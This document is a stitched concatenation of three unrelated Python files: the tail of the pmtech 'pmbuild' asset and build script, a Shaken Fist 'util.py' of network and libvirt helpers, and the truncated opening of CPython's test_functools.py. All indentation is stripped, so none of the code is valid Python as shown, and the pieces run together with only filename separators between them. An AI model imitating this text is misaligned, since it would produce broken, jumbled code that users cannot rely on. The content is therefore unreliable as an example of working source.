files = get_task_files(task)
container_files = []
skip = 0
for fi in range(0, len(files)):
if fi < skip:
continue
f = files[fi]
cpos = f[0].find(container_ext)
if cpos != -1:
container_name = f[0][:cpos + len(container_ext)]
export = export_config_for_directory(container_name, "osx")
container_src = container_name + "/container.txt"
container_dst = os.path.dirname(f[1])
container_dir = os.path.dirname(f[0])
cf = (container_src, container_dst)
file_list = ""
# list of files in json
if "files" in export:
for xf in export["files"]:
file_list += os.path.join(container_name, xf) + "\n"
# otherwise take all files in the directory
else:
dir_files = sorted(os.listdir(container_dir))
for xf in dir_files:
if xf.endswith(".jsn") or xf.endswith(".DS_Store") or xf.endswith(".txt"):
continue
file_list += os.path.join(container_name, xf) + "\n"
update_container = False
if os.path.exists(container_src):
cur_container = open(container_src, "r").read()
if cur_container != file_list:
update_container = True
else:
update_container = True
if update_container:
open(container_src, "w+").write(file_list)
container_files.append(cf)
for gi in range(fi+1, len(files)):
ff = files[gi]
cur_container_name = ff[0][:cpos + len(container_ext)]
if cur_container_name != container_name:
skip = gi
break
else:
container_files.append(f)
return container_files
# gets a list of files within container to track in dependencies
def get_container_dep_inputs(container_filepath, dep_inputs):
cf = open(container_filepath, "r").read().split("\n")
for cff in cf:
dep_inputs.append(cff)
return dep_inputs
# set visual studio version for building
def run_vs_version(config):
supported_versions = [
"vs2017",
"vs2019"
]
version = config["vs_version"]
if version == "latest":
config["vs_version"] = locate_vs_latest()
print("setting vs_version to: " + config["vs_version"])
return config
else:
if version not in supported_versions:
print("[error]: unsupported visual studio version " + str(version))
print(" supported versions are " + str(supported_versions))
# copy files, directories or wildcards
def run_copy(config):
print("--------------------------------------------------------------------------------")
print("copy ---------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
copy_tasks = config["copy"]
for task in copy_tasks:
files = get_task_files(task)
for f in files:
util.copy_file_create_dir_if_newer(f[0], f[1])
# single jsn job to run on a thread
def run_jsn_thread(f, ii, config, jsn_tasks):
cmd = python_tool_to_platform(config["tools"]["jsn"])
cmd += " -i " + f[0] + " -o " + f[1] + ii
imports = jsn.get_import_file_list(f[0], jsn_tasks["import_dirs"])
inputs = [f[0], config["tools"]["jsn"]]
for im in imports:
inputs.append(im)
dep = dependencies.create_dependency_info(inputs, [f[1]], cmd)
if not dependencies.check_up_to_date_single(f[1], dep):
subprocess.call(cmd, shell=True)
dependencies.write_to_file_single(dep, util.change_ext(f[1], ".dep"))
# convert jsn to json for use at runtime
def run_jsn(config):
print("--------------------------------------------------------------------------------")
print("jsn ----------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
threads = []
jsn_tasks = config["jsn"]
ii = " -I "
for i in jsn_tasks["import_dirs"]:
ii += i + " "
for task in jsn_tasks["files"]:
files = get_task_files(task)
for f in files:
if not os.path.exists(f[0]):
print("[warning]: file or directory " + f[0] + " does not exist!")
continue
x = threading.Thread(target=run_jsn_thread, args=(f, ii, config, jsn_tasks))
threads.append(x)
x.start()
for t in threads:
t.join()
# premake
def run_premake(config):
print("--------------------------------------------------------------------------------")
print("premake ------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
cmd = tool_to_platform(config["tools"]["premake"])
for c in config["premake"]:
if c == "vs_version":
c = config["vs_version"]
cmd += " " + c
# add pmtech dir
cmd += " --pmtech_dir=\"" + config["env"]["pmtech_dir"] + "\""
# add sdk version for windows
if "sdk_version" in config.keys():
cmd += " --sdk_version=\"" + str(config["sdk_version"]) + "\""
# check for teamid
if "require_teamid" in config:
if config["require_teamid"]:
configure_teamid(config)
cmd += " --teamid=\"" + config["teamid"] + "\""
subprocess.call(cmd, shell=True)
# pmfx
def run_pmfx(config):
cmd = python_tool_to_platform(config["tools"]["pmfx"])
for c in config["pmfx"]:
cmd += " " + c
subprocess.call(cmd, shell=True)
# single model build / optimise ran on a separate thread
def run_models_thread(cmd):
p = subprocess.Popen(cmd, shell=True)
p.wait()
# models
def run_models(config):
print("--------------------------------------------------------------------------------")
print("models -------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
tool_cmd = python_tool_to_platform(config["tools"]["models"])
threads = []
for task in config["models"]:
task_files = get_task_files(task)
mesh_opt = ""
if os.path.exists(config["tools"]["mesh_opt"]):
mesh_opt = config["tools"]["mesh_opt"]
for f in task_files:
cmd = " -i " + f[0] + " -o " + os.path.dirname(f[1])
if len(mesh_opt) > 0:
cmd += " -mesh_opt " + mesh_opt
x = threading.Thread(target=run_models_thread, args=(tool_cmd + cmd,))
threads.append(x)
x.start()
for t in threads:
t.join()
# build third_party libs
def run_libs(config):
print("--------------------------------------------------------------------------------")
print("libs ---------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
shell = ["linux", "osx", "ios"]
cmd = ""
for arg in config["libs"]:
cmd = arg
if util.get_platform_name() in shell:
pass
else:
args = ""
args += config["env"]["pmtech_dir"] + "/" + " "
args += config["sdk_version"] + " "
if "vs_version" not in config:
config["vs_version"] = "vs2017"
args += config["vs_version"] + " "
cmd += "\"" + config["vcvarsall_dir"] + "\"" + " " + args
print(cmd)
p = subprocess.Popen(cmd, shell=True)
p.wait()
# textures
def run_textures(config):
print("--------------------------------------------------------------------------------")
print("textures -----------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
tool_cmd = tool_to_platform(config["tools"]["texturec"])
for task in config["textures"]:
files = get_task_files_containers(task)
for f in files:
copy_fmt = [".dds", ".pmv"]
conv_fmt = [".png", ".jpg", ".tga", ".bmp", ".txt"]
cont_fmt = [".txt"]
fext = os.path.splitext(f[0])[1]
if fext in copy_fmt:
util.copy_file_create_dir_if_newer(f[0], f[1])
if fext in conv_fmt:
export = export_config_for_file(f[0])
dep_inputs = [f[0], config["tools"]["texturec"]]
if fext in cont_fmt:
export = export_config_for_directory(f[0], "osx")
dep_inputs = get_container_dep_inputs(f[0], dep_inputs)
dst = util.change_ext(f[1], ".dds").lower()
# to refactor
if "format" not in export.keys():
export["format"] = "RGBA8"
cmd = tool_cmd + " "
cmd += "-f " + f[0] + " "
cmd += "-t " + export["format"] + " "
if "cubemap" in export.keys() and export["cubemap"]:
cmd += " --cubearray "
if "mips" in export.keys() and export["mips"]:
cmd += " --mips "
if "texturec" in export.keys():
cmd += export["texturec"]
cmd += "-o " + dst
dep = dependencies.create_dependency_info(dep_inputs, [dst], cmd)
if not dependencies.check_up_to_date_single(dst, dep):
util.create_dir(dst)
subprocess.call(cmd, shell=True)
dependencies.write_to_file_single(dep, util.change_ext(dst, ".dep"))
# cleans directories specified in config["clean"]
def run_clean(config):
print("--------------------------------------------------------------------------------")
print("clean --------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
for clean_task in config["clean"]:
if os.path.isfile(clean_task):
print("file " + clean_task)
os.remove(clean_task)
elif os.path.isdir(clean_task):
print("directory " + clean_task)
shutil.rmtree(clean_task)
# generates metadata json to put in data root dir, for doing hot loading and other re-build tasks
def generate_pmbuild_config(config, profile):
if "data_dir" not in config:
print("[error]: did not generate pmbuild_config.json for live reloading")
return
wd = os.getcwd()
pmd = util.sanitize_file_path(config["env"]["pmtech_dir"])
md = {
"profile": profile,
"pmtech_dir": pmd,
"pmbuild": "cd " + wd + " && " + pmd + "pmbuild " + profile + " "
}
util.create_dir(config["data_dir"])
np = os.path.join(config["data_dir"], "pmbuild_config.json")
np = os.path.normpath(np)
f = open(np, "w+")
f.write(json.dumps(md, indent=4))
# gets a commandline to setup vcvars for msbuild from command line
def setup_vcvars(config):
return "pushd \ && cd \"" + config["vcvarsall_dir"] + "\" && vcvarsall.bat x86_amd64 && popd"
# run build commands.. build is now deprecated in favour of 'make'
def run_build(config):
print("--------------------------------------------------------------------------------")
print("build --------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
for build_task in config["build"]:
if util.get_platform_name() == "win32":
build_task = setup_vcvars(config) + " && " + build_task
p = subprocess.Popen(build_task, shell=True)
e = p.wait()
if e != 0:
exit(0)
# generate a cli command for building with different toolchains (make, gcc/clang, xcodebuild, msbuild)
def make_for_toolchain(jsn_config, options):
make_config = jsn_config["make"]
toolchain = make_config["toolchain"]
exts = {
"make": ".make",
"emmake": ".make",
"xcodebuild": ".xcodeproj",
"msbuild": ".vcxproj"
}
ext = exts[toolchain]
strip_ext_toolchain = ["make", "emmake"]
strip_exts = [".make"]
# first option is always target, it can be 'all' or a single build
targets = []
if options[0] == "all":
for file in os.listdir(make_config["dir"]):
if file.endswith(ext):
if ext in strip_exts:
file = os.path.splitext(file)[0]
targets.append(file)
else:
if toolchain not in strip_ext_toolchain:
targets.append(options[0] + ext)
else:
targets.append(options[0])
# msbuild needs vcvars all
setup_env = ""
if toolchain == "msbuild":
setup_env = setup_vcvars(jsn_config) + " &&"
cmds = {
"make": "make",
"emmake": "emmake make",
"xcodebuild": "xcodebuild",
"msbuild": "msbuild"
}
cmd = cmds[toolchain]
target_options = {
"make": "",
"emmake": "",
"xcodebuild": "-project ",
"msbuild": ""
}
target_option = target_options[toolchain]
configs = {
"make": "config=",
"emmake": "config=",
"xcodebuild": "-configuration ",
"msbuild": "/p:Configuration="
}
config = ""
# parse other options
extra_args = ""
for option in options[1:]:
# config
if option.find("config=") != -1:
config = configs[toolchain]
config += option.replace("config=", "")
else:
# pass through any additional platform specific args
extra_args += option
# build final cli command
make_commands = []
for target in targets:
cmdline = setup_env + " " + cmd + " " + target_option + " " + target + " " + config + " " + extra_args
make_commands.append(cmdline)
return make_commands
# runs make, and compiles from makefiles, vs solution or xcode project.
def run_make(config, options):
print("--------------------------------------------------------------------------------")
print("make ---------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
cwd = os.getcwd()
if "make" not in config.keys():
print("[error] make config missing from config.jsn ")
return
if len(options) == 0:
print("[error] no make target specified")
return
make_commands = make_for_toolchain(config, options)
# cd to the build dir
os.chdir(config["make"]["dir"])
if len(options) == 0:
print("[error] no make target specified")
else:
for mc in make_commands:
subprocess.call(mc, shell=True)
os.chdir(cwd)
# start a simple webserver serving path on port
def start_server(path, port=8000):
httpd = HTTPServer(('', port), CGIHTTPRequestHandler)
httpd.serve_forever()
# starts a web server on a thread and loads a sample in the browser
def run_web(cmd):
port = 8000
daemon = threading.Thread(name='daemon_server', target=start_server, args=('.', port))
daemon.setDaemon(True)
daemon.start()
chrome_path = {
"osx": 'open -a /Applications/Google\ Chrome.app %s',
"win32": "C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s",
"linux": ""
}
plat = util.get_platform_name()
webbrowser.get(chrome_path[plat]).open('http://localhost:{}/{}'.format(port, cmd))
while True:
time.sleep(1)
# launches and exectuable program from the commandline
def run_exe(config, options):
print("--------------------------------------------------------------------------------")
print("run ----------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
cwd = os.getcwd()
if "run" not in config.keys():
print("[error] run config missing from config.jsn ")
return
run_config = config["run"]
if len(options) == 0:
print("[error] no run target specified")
return
targets = []
if options[0] == "all":
for file in os.listdir(run_config["dir"]):
if file.endswith(run_config["ext"]):
targets.append(os.path.splitext(file)[0])
else:
targets.append(options[0])
# switch to bin dir
os.chdir(run_config["dir"])
for t in targets:
cmd = run_config["cmd"]
cmd = cmd.replace("%target%", t)
if run_config["ext"] == ".html":
run_web(cmd)
else:
for o in options[1:]:
cmd += " " + o
print(cmd)
subprocess.call(cmd, shell=True)
os.chdir(cwd)
# generates function pointer bindings to call pmtech from a live reloaded dll.
def run_cr(config):
print("--------------------------------------------------------------------------------")
print("cr -----------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print(config["cr"]["output"])
files = config["cr"]["files"]
free_funcs = []
added = []
for f in files:
source = open(f, "r").read()
source = cgu.remove_comments(source)
strings, source = cgu.placeholder_string_literals(source)
functions, function_names = cgu.find_functions(source)
for func in functions:
free = len(func["qualifier"]) == 0
for s in func["scope"]:
if s["type"] == "struct":
free = False
break
# cant add members
if not free:
continue
# cant add overloads
if func["name"] in added:
continue
func["file"] = os.path.basename(f)
added.append(func["name"])
free_funcs.append(func)
# start writing code
code = cgu.src_line("// codegen_2")
code += cgu.src_line("#pragma once")
for f in files:
bn = os.path.basename(f)
code += cgu.src_line('#include ' + cgu.in_quotes(bn))
code += cgu.src_line("using namespace pen;")
code += cgu.src_line("using namespace put;")
code += cgu.src_line("using namespace pmfx;")
code += cgu.src_line("using namespace ecs;")
code += cgu.src_line("using namespace dbg;")
# sort by immediate scope
scope_funcs = dict()
for f in free_funcs:
ff = f["file"]
l = len(f["scope"])
if l > 0:
s = f["scope"][l-1]["name"]
if s not in scope_funcs.keys():
scope_funcs[s] = list()
scope_funcs[s].append(f)
# add bindings grouped by scope
for scope in scope_funcs:
# function pointer typedefs
for f in scope_funcs[scope]:
args = cgu.get_funtion_prototype(f)
code += cgu.src_line("typedef " + f["return_type"] + " (*proc_" + f["name"] + ")" + args + ";")
# struct
struct_name = "__" + scope
code += cgu.src_line("struct " + struct_name + " {")
code += cgu.src_line("void* " + struct_name + "_start;")
# function pointers members
for f in scope_funcs[scope]:
code += cgu.src_line("proc_" + f["name"] + " " + f["name"] + ";")
code += cgu.src_line("void* " + struct_name + "_end;")
code += cgu.src_line("};")
# pointers to contexts
inherit = ""
for scope in scope_funcs:
if len(inherit) > 0:
inherit += ", "
inherit += "public __" + scope
code += cgu.src_line("struct live_context:")
code += cgu.src_line(inherit + "{")
code += cgu.src_line("f32 dt;")
code += cgu.src_line("ecs::ecs_scene* scene;")
for scope in scope_funcs:
code += cgu.src_line("__" + scope + "* " + scope + "_funcs;")
code += cgu.src_line("live_context() {")
# bind function pointers to addresses
code += cgu.src_line("#if !DLL")
for scope in scope_funcs:
for f in scope_funcs[scope]:
full_scope = ""
for q in f["scope"]:
if q["type"] == "namespace":
full_scope += q["name"] + "::"
code += cgu.src_line(f["name"] + " = &" + full_scope + f["name"] + ";")
code += cgu.src_line("#endif")
code += cgu.src_line("}")
code += cgu.src_line("};")
output_file = open(config["cr"]["output"], "w")
output_file.write(cgu.format_source(code, 4))
return
# top level help
def pmbuild_help(config):
print("pmbuild -help ------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("\nusage: pmbuild <profile> <tasks...>")
print("\noptions:")
print(" -help (display this dialog).")
print(" -<task> -help (display task help).")
print(" -cfg (print jsn config for current profile).")
print(" -msbuild (indicates msbuild prompt and no need to call vcvarsall.bat")
print("\nprofiles:")
print(" config.jsn (edit task settings in here)")
for p in config.keys():
print(" " * 8 + p)
print("\ntasks (in order of execution):")
print(" -all (builds all tasks).")
print(" -n<task name> (excludes task).")
print(" -clean (delete specified directories).")
print(" -libs (build thirdparty libs).")
print(" -premake (run premake, generate ide projects).")
print(" -models (convert to binary model, skeleton and material format).")
print(" -pmfx (shader compilation, code-gen, meta-data gen).")
print(" -textures (convert, compress, generate mip-maps, arrays, cubemaps).")
print(" -copy (copy files, folders or wildcards) [src, dst].")
print(" -build (build code) [src, dst]. deprecated use make instead.")
print("\nexplicit tasks (must specify flag, not included in -all):")
print(" -make (runs make, xcodebuild, msbuild) <target> <config> <flags>")
print(" -run (runs exe) <target> <options>")
print("\n")
def clean_help(config):
print("clean help ---------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("removes all intermediate and temp directories:")
print("\njsn syntax: array of [directories to remove...].")
print("clean: [")
print(" [<rm dir>],")
print(" ...")
print("]")
print("\n")
def vs_version_help(config):
print("vs version help ---------------------------------------------------------------")
print("-------------------------------------------------------------------------------")
print("select version of visual studio for building libs and porjects:")
print("\njsn syntax:")
print("vs_version: <version>")
print("\n")
print("version options:")
print(" latest (will choose latest version installed on your machine)")
print(" vs2017 (minimum supported compiler)")
print(" vs2019")
print("\n")
def libs_help(config):
print("libs help ----------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("builds tools and third-party libraries:")
print("\njsn syntax: array of [cmdlines, ..]")
print("libs: [")
print(" [\"command line\"],")
print(" ...")
print("]\n")
print("reguires:")
print(" config[\"env\"][\"pmtech_dir\"]")
print(" win32:")
print(" config[\"sdk_version\"]")
print(" config[\"vcvarsall_dir\"]")
print("\n")
def premake_help(config):
print("premake help -------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("generate ide projects or make files from lua descriptions:")
print("\njsn syntax: array of [<action>, cmdline options..]")
print("premake: [")
print(" [\"<action> (vs2017, xcode4, gmake, android-studio)\"],")
print(" [\"--premake_option <value>\"],")
print(" ...")
print("]\n")
print("reguires: config[\"env\"][\"pmtech_dir\"]\n")
cmd = tool_to_platform(config["tools"]["premake"])
cmd += " --help"
subprocess.call(cmd, shell=True)
print("\n")
def pmfx_help(config):
print("pmfx help ----------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("compile platform specific shaders:")
print("\njsn syntax: array of [cmdline options, ..]")
print("pmfx: [")
print(" [\"-pmfx_option <value>\"],")
print(" ...")
print("]\n")
cmd = python_tool_to_platform(config["tools"]["pmfx"])
cmd += " -help"
subprocess.call(cmd, shell=True)
print("\n")
def models_help(config):
print("models help --------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("create binary pmm and pma model files from collada files:")
print("\njsn syntax: array of [src, dst] pairs.")
print("models: [")
print(" [<src files, directories or wildcards>, <dst file or folder>],")
print(" ...")
print("]")
print("accepted file formats: .dae, .obj")
print("\n")
def textures_help(config):
print("textures help ------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("convert, re-size or compress textures:")
print("\njsn syntax: array of [src, dst] pairs.")
print("copy: [")
print(" [<src files, directories or wildcards>, <dst file or folder>],")
print(" ...")
print("]")
print("export.jsn:")
print("{")
print(" format: \"RGBA8\"")
print(" filename.png {")
print(" format: \"override_per_file\"")
print(" }")
print("}\n")
tool_cmd = tool_to_platform(config["tools"]["texturec"])
subprocess.call(tool_cmd + " --help", shell=True)
subprocess.call(tool_cmd + " --formats", shell=True)
print("\n")
def copy_help(config):
print("copy help ----------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("copy files from src to dst:")
print("\njsn syntax: array of [src, dst] pairs.")
print("copy: [")
print(" [<src files, directories or wildcards>, <dst file or folder>],")
print(" ...")
print("]")
print("\n")
def jsn_help(config):
print("jsn help ----------------------------------------------------------------------")
print("-------------------------------------------------------------------------------")
print("convert jsn to json:")
print("\njsn syntax: array of [src, dst] pairs.")
print("jsn: [")
print(" [<src files, directories or wildcards>, <dst file or folder>],")
print(" ...")
print("]")
print("\n")
def build_help(config):
print("build help ----------------------------------------------------------------------")
print("---------------------------------------------------------------------------------")
print("\njsn syntax: array of commands.")
print("build: [")
print(" command args args args,")
print(" ...")
print("]")
print("\n")
def make_help(config):
print("make help ----------------------------------------------------------------------")
print("---------------------------------------------------------------------------------")
print("\njsn syntax:")
print("make: {")
print(" toolchain: <make, emmake, xcodebuild, msbuild>")
print(" dir: <path to makefiles, xcodeproj, etc>")
print("]")
print("\ncommandline options.")
print("-make <target> <config> <flags>")
print(" target can be all, or basic_texture etc.")
print("config=<debug, release, etc>")
print("any additional flags after these will be forwarded to the build toolchain")
print("\n")
def run_help(config):
print("run help ------------------------------------------------------------------------")
print("---------------------------------------------------------------------------------")
print("\njsn syntax:")
print("run: {")
print(" cmd: <template of command to run>")
print(" use %target% as a var to replace target names in bin dir, ie %target%.exe ")
print(" dir: <path to bin directory>")
print(" ext: <.exe, .app, ''>")
print("]")
print("\ncommandline options.")
print("-run <target> <flags>")
print(" target can be all or basic_texture etc, name is passed as %target% in run:{ cmd: }")
print(" debug binaries with have _d suffix so use basic_texture_d to run the debug exe")
print("any additional flags after these will be forwarded to the executable")
print(" use -test to run the example tests")
print("\n")
def cr_help(config):
print("cr help -------------------------------------------------------------------------")
print("---------------------------------------------------------------------------------")
print("generate cfunction pointers for calling from fungos/cr")
print("\njsn syntax: array of commands.")
print("cr: {")
print(" files:[...], output: <filepath>")
print("}")
print("\n")
# print duration of job, ts is start time
def print_duration(ts):
millis = int((time.time() - ts) * 1000)
print("--------------------------------------------------------------------------------")
print("Took (" + str(millis) + "ms)")
# stub for jobs to do nothing
def stub(config):
pass
# main function
def main():
start_time = time.time()
# must have config.json in working directory
if not os.path.exists("config.jsn"):
print("[error] no config.json in current directory.")
exit(1)
# load jsn, inherit etc
config_all = jsn.loads(open("config.jsn", "r").read())
# top level help
if "-help" in sys.argv or len(sys.argv) == 1:
if len(sys.argv) <= 2:
pmbuild_help(config_all)
exit(0)
call = "run"
if "-help" in sys.argv:
call = "help"
# first arg is build profile
if call == "run":
if sys.argv[1] not in config_all:
print("[error] " + sys.argv[1] + " is not a valid pmbuild profile")
exit(0)
config = config_all[sys.argv[1]]
# load config user for user specific values (sdk version, vcvarsall.bat etc.)
configure_user(config, sys.argv)
if "-cfg" in sys.argv:
print(json.dumps(config, indent=4))
else:
config = config_all["base"]
# tasks are executed in order they are declared here
tasks = collections.OrderedDict()
tasks["vs_version"] = {"run": run_vs_version, "help": vs_version_help}
tasks["libs"] = {"run": run_libs, "help": libs_help, "exclusive": True}
tasks["premake"] = {"run": run_premake, "help": premake_help}
tasks["pmfx"] = {"run": run_pmfx, "help": pmfx_help}
tasks["models"] = {"run": run_models, "help": models_help}
tasks["textures"] = {"run": run_textures, "help": textures_help}
tasks["jsn"] = {"run": run_jsn, "help": jsn_help}
tasks["copy"] = {"run": run_copy, "help": copy_help}
tasks["build"] = {"run": run_build, "help": build_help}
tasks["cr"] = {"run": run_cr, "help": cr_help}
tasks["make"] = {"run": stub, "help": make_help, "exclusive": True}
tasks["run"] = {"run": stub, "help": run_help, "exclusive": True}
# clean is a special task, you must specify separately
if "-clean" in sys.argv:
if call == "help":
clean_help(config)
else:
run_clean(config)
# run tasks in order they are specified.
for key in tasks.keys():
if call == "run":
if key not in config.keys():
continue
ts = time.time()
run = False
# check flags to include or exclude jobs, pmbuild <profile> with no args is equivalent to passing -all
if ("-all" in sys.argv or len(sys.argv) == 2) and "-n" + key not in sys.argv:
if "exclusive" in tasks[key].keys():
if tasks[key]["exclusive"]:
continue
run = True
elif len(sys.argv) != 2 and "-" + key in sys.argv:
run = True
# run job
if run:
tasks.get(key, lambda config: '')[call](config)
print_duration(ts)
# metadata for rebuilding and hot reloading
generate_pmbuild_config(config, sys.argv[1])
# make and run need to forward args
if "-make" in sys.argv:
i = sys.argv.index("-make") + 1
options = []
while i < len(sys.argv):
options.append(sys.argv[i])
i += 1
if call == "help":
pass
else:
run_make(config, options)
if "-run" in sys.argv:
i = sys.argv.index("-run") + 1
options = []
while i < len(sys.argv):
options.append(sys.argv[i])
i += 1
if call == "help":
pass
else:
run_exe(config, options)
print("--------------------------------------------------------------------------------")
print("all jobs complete --------------------------------------------------------------")
print_duration(start_time)
# entry point of pmbuild
if __name__ == "__main__":
print("--------------------------------------------------------------------------------")
print("pmbuild (v3) -------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("")
main()
|
util.py
|
# Copyright 2020 Michael Still
import importlib
import json
import multiprocessing
from pbr.version import VersionInfo
import random
import re
import requests
import secrets
import string
import sys
import time
import traceback
from oslo_concurrency import processutils
from shakenfist import db
from shakenfist.config import config
from shakenfist import logutil
LOG, _ = logutil.setup(__name__)
class RecordedOperation():
def __init__(self, operation, relatedobject):
self.operation = operation
self.object = relatedobject
def __enter__(self):
self.start_time = time.time()
object_type, object_uuid = self.unique_label()
if object_type and object_uuid:
db.add_event(object_type, object_uuid,
self.operation, 'start', None, None)
return self
def __exit__(self, *args):
duration = time.time() - self.start_time
log = LOG
object_type, object_uuid = self.unique_label()
if object_uuid:
if object_type:
db.add_event(object_type, object_uuid,
self.operation, 'finish', duration, None)
log = LOG.withObj(self.object)
else:
log = LOG.withField({'label', self.object})
log.withField('duration', duration).info('Finish %s', self.operation)
def unique_label(self):
if self.object:
if isinstance(self.object, str):
object_type = None
object_uuid = self.object
else:
object_type, object_uuid = self.object.unique_label()
else:
object_type = None
object_uuid = None
return object_type, object_uuid
def is_network_node():
"""Test if this node is the network node."""
return config.NODE_IP == config.NETWORK_NODE_IP
def check_for_interface(name, up=False):
stdout, stderr = execute(None,
'ip link show %s' % name, check_exit_code=[0, 1])
if stderr.rstrip('\n').endswith(' does not exist.'):
return False
if up:
return bool(re.match(r'.*[<,]UP[,>].*', stdout))
return True
def get_interface_addresses(namespace, name):
in_namespace = ''
if namespace:
in_namespace = 'ip netns exec %s ' % namespace
stdout, _ = execute(None,
'%(in_namespace)sip addr show %(name)s'
% {
'in_namespace': in_namespace,
'name': name
},
check_exit_code=[0, 1])
if not stdout:
return
inet_re = re.compile(r' +inet (.*)/[0-9]+.*')
for line in stdout.split('\n'):
m = inet_re.match(line)
if m:
yield m.group(1)
return
def get_default_routes(namespace):
in_namespace = ''
if namespace:
in_namespace = 'ip netns exec %s ' % namespace
stdout, _ = execute(None,
'%(in_namespace)sip route list default'
% {
'in_namespace': in_namespace
})
if not stdout:
return []
routes = []
for line in stdout.split('\n'):
elems = line.split(' ')
if len(elems) > 3 and elems[2] not in routes:
routes.append(elems[2])
return routes
def get_safe_interface_name(interface):
if len(interface) > 15:
orig_interface = interface
interface = interface[:15]
LOG.info('Interface name truncated from %s to %s'
% (orig_interface, interface))
return interface
def create_interface(interface, interface_type, extra):
interface = get_safe_interface_name(interface)
execute(None,
'ip link add %(interface)s type %(interface_type)s %(extra)s'
% {'interface': interface,
'interface_type': interface_type,
'extra': extra})
def nat_rules_for_ipblock(ipblock):
out, _ = execute(None, 'iptables -t nat -L POSTROUTING -n -v')
# Output looks like this:
# Chain POSTROUTING (policy ACCEPT 199 packets, 18189 bytes)
# pkts bytes target prot opt in out source destination
# 23 1736 MASQUERADE all -- * ens4 192.168.242.0/24 0.0.0.0/0
for line in out.split('\n'):
if line.find(str(ipblock)) != -1:
return True
return False
LIBVIRT = None
def get_libvirt():
global LIBVIRT
if not LIBVIRT:
LIBVIRT = importlib.import_module('libvirt')
return LIBVIRT
def extract_power_state(libvirt, domain):
state, _ = domain.state()
if state == libvirt.VIR_DOMAIN_SHUTOFF:
return 'off'
if state == libvirt.VIR_DOMAIN_CRASHED:
return 'crashed'
if state in [libvirt.VIR_DOMAIN_PAUSED,
libvirt.VIR_DOMAIN_PMSUSPENDED]:
return 'paused'
# Covers all "running states": BLOCKED, NOSTATE,
# RUNNING, SHUTDOWN
return 'on'
def get_api_token(base_url, namespace='system'):
with db.get_lock('namespace', None, namespace,
op='Get API token'):
auth_url = base_url + '/auth'
LOG.info('Fetching %s auth token from %s' % (namespace, auth_url))
ns = db.get_namespace(namespace)
if 'service_key' in ns:
key = ns['service_key']
else:
key = ''.join(secrets.choice(string.ascii_lowercase)
for i in range(50))
ns['service_key'] = key
db.persist_namespace(namespace, ns)
r = requests.request('POST', auth_url,
data=json.dumps({
'namespace': namespace,
'key': key
}),
headers={'Content-Type': 'application/json',
'User-Agent': get_user_agent()})
if r.status_code != 200:
raise Exception('Unauthorized')
return 'Bearer %s' % r.json()['access_token']
CACHED_VERSION = None
def get_version():
global CACHED_VERSION
if not CACHED_VERSION:
CACHED_VERSION = VersionInfo('shakenfist').version_string()
return CACHED_VERSION
def get_user_agent():
return 'Mozilla/5.0 (Ubuntu; Linux x86_64) Shaken Fist/%s' % get_version()
def discover_interfaces():
mac_to_iface = {
'00:00:00:00:00:00': 'broadcast'
}
iface_to_mac = {}
vxid_to_mac = {}
iface_name = None
iface_name_re = re.compile('^[0-9]+: ([^:]+): <')
link_ether = None
link_ether_re = re.compile('^ link/ether (.*) brd .*')
stdout, _ = execute(None, 'ip addr list')
for line in stdout.split('\n'):
line = line.rstrip()
m = iface_name_re.match(line)
if m:
iface_name = m.group(1)
continue
m = link_ether_re.match(line)
if m:
link_ether = m.group(1)
mac_to_iface[link_ether] = iface_name
iface_to_mac[iface_name] = link_ether
if iface_name.startswith('vxlan-'):
vxid = int(iface_name.split('-')[1])
vxid_to_mac[vxid] = link_ether
return mac_to_iface, iface_to_mac, vxid_to_mac
def ignore_exception(processname, e):
msg = '[Exception] Ignored error in %s: %s' % (processname, e)
_, _, tb = sys.exc_info()
if tb:
msg += '\n%s' % traceback.format_exc()
LOG.error(msg)
def _lock_refresher(locks):
while True:
db.refresh_locks(locks)
time.sleep(10)
def execute(locks, command, check_exit_code=[0], env_variables=None):
if not locks:
return processutils.execute(
command, check_exit_code=check_exit_code,
env_variables=env_variables, shell=True)
else:
p = multiprocessing.Process(
target=_lock_refresher, args=(locks,))
p.start()
try:
return processutils.execute(
command, check_exit_code=check_exit_code,
env_variables=env_variables, shell=True)
finally:
p.terminate()
p.join()
def random_macaddr():
return '02:00:00:%02x:%02x:%02x' % (random.randint(0, 255),
random.randint(0, 255),
random.randint(0, 255))
|
test_functools.py
|
import abc
import builtins
import collections
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import time
import unittest
from weakref import proxy
import contextlib
try:
import threading
except ImportError:
threading = None
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
